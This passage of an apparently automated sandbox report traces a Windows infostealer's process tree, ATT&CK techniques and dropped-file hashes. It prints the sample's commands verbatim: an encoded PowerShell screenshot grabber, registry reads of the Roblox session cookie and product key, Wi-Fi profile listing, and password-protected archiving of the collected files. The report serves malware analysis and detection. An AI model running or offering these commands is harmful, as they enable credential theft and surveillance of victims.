    - Suspicious use of WriteProcessMemory
    PID:4916
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:2928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2368
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      System Location Discovery: System Language Discovery
      Gathers system information
      PID:4012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:468
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3964
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3692
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0fn1jrkc\0fn1jrkc.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4168
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA9C.tmp" "c:\Users\Admin\AppData\Local\Temp\0fn1jrkc\CSCC0998805EBB047369272D634DC1AF9E.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2216
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3012
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2704
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3476
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1704
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4392
  - - C:\Windows\SysWOW64\getmac.exe
      getmac
      4⤵
      System Location Discovery: System Language Discovery
      PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:872
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3732
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31802\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\u28Bb.zip" *"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2296
  - - C:\Users\Admin\AppData\Local\Temp\_MEI31802\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI31802\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\u28Bb.zip" *
      4⤵
      Executes dropped EXE
      PID:4076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4604
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2676
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      System Location Discovery: System Language Discovery
      PID:4972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2136
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      PID:4392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3316
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:748
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:3320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3924
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3460

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe c89962c3eeb8606ce60dcfd197985aaf JmTz55+PeUuW4At4F7XWEw.0.1.0.0.0
1⤵
PID:3480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
bdf103ecadf2098f1a4af55b65cd072a

SHA1
cd0c398d2c35946a65653d8f5be64681dff0ac96

SHA256
3026e82835ee98106040a6da7252950f518e6fb3449bfd2293d7f9abbb19918a

SHA512
ef8ec609de440269cb7597041b3df164a7d83141b038003f26b782de53c0a0de4b985576c862d7a637a6b3d8201267c45c22d726b1d76fd66793a211b81463c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
d54b849d832be3c99fe38e477265a530

SHA1
6462ae0828adf08116795563894a7244516a64e7

SHA256
140eb2c4fbb71a118118f9969011213d89e5951c19425da30d79f2f7debc7309

SHA512
86a44d45bc9c57505464dff7e0a25797ed2334e83579fcc643299942a57a35344f1e60bcf2de700625aee72e2f934e571b5273cf226014efdba8c1d4ff144c93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2de715b3334c71b7dad5fe8a750d32a5

SHA1
9226e4f973813041ebedb5e330375598ceade060

SHA256
9bab15d6f1e339dcb2670009f71a9e5e031e0402bcc36a3be371a0f13433fff2

SHA512
0233af1504558118230a2a8c74f83f10c6c6c37c0e58d26a3d347355f7a2392288c635321c3aa6092d42764c945781e4feb56a8bcf280d41e1a2cf12b9e50667

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6f6dc5a8e65e72766b3522d0614f2984

SHA1
dc29004f2130ac522d5249ad50f99be0e6e42f58

SHA256
bd67859a0b4cb4a1539972fe42fb682f5d58d4a5acccb522c7050e8dcc95960b

SHA512
e76d2263f4041f427591bf7de4a77d895354971bdde307351533f557ec2b7fbcfe5b44cd5c58b6090c8daa16ceda9915c59fc86de7b3e646c7c39a3bb997a23d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2f9c3f23894d057a73b44b02f6c5f448

SHA1
d67c5f3aded6cf94493c1e92cfafab8ea9daf872

SHA256
d217335c89fde86d12c668154baa9c29b9de17ba873a17af5c38f083ac7a959a

SHA512
1f7e1cd6e5b9a424bb82cd86e3f017d0281eb998cc45f8001768b78520aa259f7731a966fb8c245c5702345ca60f1c8183c3754607a6b5b27abe299a64a36082

Download Submit
C:\Users\Admin\AppData\Local\Temp\0fn1jrkc\0fn1jrkc.dll

Filesize
4KB

MD5
4374f3f37cd35f9110b323bbbd2b68e5

SHA1
50ad39334240fd22c4ebc9a65d3b60eea01242f1

SHA256
5e44f280602e3128ff5c307deae3d09169d546a98ac0692da890556fa1e66cfd

SHA512
e23b75d9a0ca51d97873104499cbc901693752d7f02da07576ee23090a95230e3d8bb126d9bb241671991f8c9342d3ca56b139a054bb4fb71f1bdf80b311fc63

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFA9C.tmp

Filesize
1KB

MD5
09ea8385340c94f2960df1e280640dfd

SHA1
b93f24958229044d1841a2ed8c74ed1f064d84c7

SHA256
f724fa418554da2098dbf42c84a3fd3fd752289f501d1c3e831d2f0dfbeed893

SHA512
4500ef1c9dd7a778ed761c78fa5a9409cf63541a80035bcbad4503c5997853b4731459380691be7f0733b0c195a9cff96d04be5db93be16c9da6b33a9497bd95

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\VCRUNTIME140.dll

Filesize
88KB

MD5
a0df29af5f6135b735dee359c0871ecf

SHA1
f7ebb9a9fd00e1ac95537158fae1167b06f490bd

SHA256
35afadbacc9a30341c1a5ee2117e69583e5044cea0bfab636dccbdcc281a8786

SHA512
fdc7a62d0b187829708ec544de52b4037da613e01a7591a2abc55f95c4719ee04f9c51d31f01edb7161b5edc3cd85004c3a55d375116baa76fb44553df592b3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_bz2.pyd

Filesize
44KB

MD5
04006baa3fdda07ad06790c814130025

SHA1
7ae71d19d31a38fa4cd06f38b1780176e9837747

SHA256
65345e9fb47a8e07135a8df71690966756fb3a16601ea76e1c37cb5a85687959

SHA512
0c1b27e18455bd966df67b719507afa9b83b0a134b985361efa13dd6001c37dc48a8c119847215235c0f8e47c6c3bc2fb2be8b5854f51368dc28f4f2df36830a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_ctypes.pyd

Filesize
52KB

MD5
e6f488f9ef063cec266cb03ecde771e9

SHA1
8f9b7780df25867599cf92f42ad7dab5cc37c60b

SHA256
1ea6ecb02632b85e278a4a74d5560662b6a9652ee8c03214139a00935abd4d3f

SHA512
47d57e082e1e172612efb364d44a407fb3dafb4efc6de02585f62bc65d39b57f233a0cdd9b3c2bd0539288b08176bd165cc1290319e861c35f5c3c877a930156

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_decimal.pyd

Filesize
79KB

MD5
e70eb2dff120e954a305c37d1ff6c19b

SHA1
246618204685a5e1d30f4a3d18a298441c65df8f

SHA256
ecbf5f140349137a46609bfb625572907deb211005c4cc0eca6875770af47f25

SHA512
15bbdad7358da39e2348986dd96f19c88d8bad83c3de0cf14b3d22205ba9c4cf0beb09d7dbaebe65af5b532b343c1336596e3754606a409c3e6f56ca0d29d3c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_hashlib.pyd

Filesize
30KB

MD5
afd1f13811e21a9a303d633cc3081d18

SHA1
d9736b444a27b0d3a13bc95d579445f9e72af99a

SHA256
052edf9eb0742063050ddb59810c34c7d640748ed760408299b6821e095922c8

SHA512
4a76a4c52f2983ea7f141343d08e32b11fc499c87282e44bd77ef50259f544e8212db235ef9cd541337fdc8fb872f34f58be3a343e7c70b29a822e3f2363e934

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_lzma.pyd

Filesize
79KB

MD5
9f4917705676062bebc879968a0d24d1

SHA1
751d9e6dae9e43eba719b36875ed89801cc1f07e

SHA256
11fc0bbe22dcdba2f4952eb38ab31447833d52c624d97253ae08a77ff65415b2

SHA512
b89df73d3980a56b2a88a6ba001e894be6f70bcbbc1d498f9cfd6981bae934d3a0193ddde75252556f1fe3ce942db4b5dcfea1982ebbbf5b9ec29a08b3e7088a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_queue.pyd

Filesize
24KB

MD5
f59da07dbbdd126cfbd617191e08d949

SHA1
f9a9f0e453cf4c2cde6511817eebe262e5f7df7e

SHA256
0a39726fe4e2da50c419b8ecf159c5f434854abd20103a89abe2aa378d8e5240

SHA512
c5e5941dd6e6bece7c0fb588254b82fe16563cfeab0fb27764466b55c7ac0a70b6dd3bca377807a3a4509ac27cc7e34ad16402d9992b3da02d726f02ed98b75f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_socket.pyd

Filesize
38KB

MD5
88b9bf60bea71ef90af7223ebe895319

SHA1
3272cab72a29855eefd68a2b85300c85553020d9

SHA256
fccad475b318a8ccdbb7cf05743be5d47a64d93615922bc0a890ab04f5319b26

SHA512
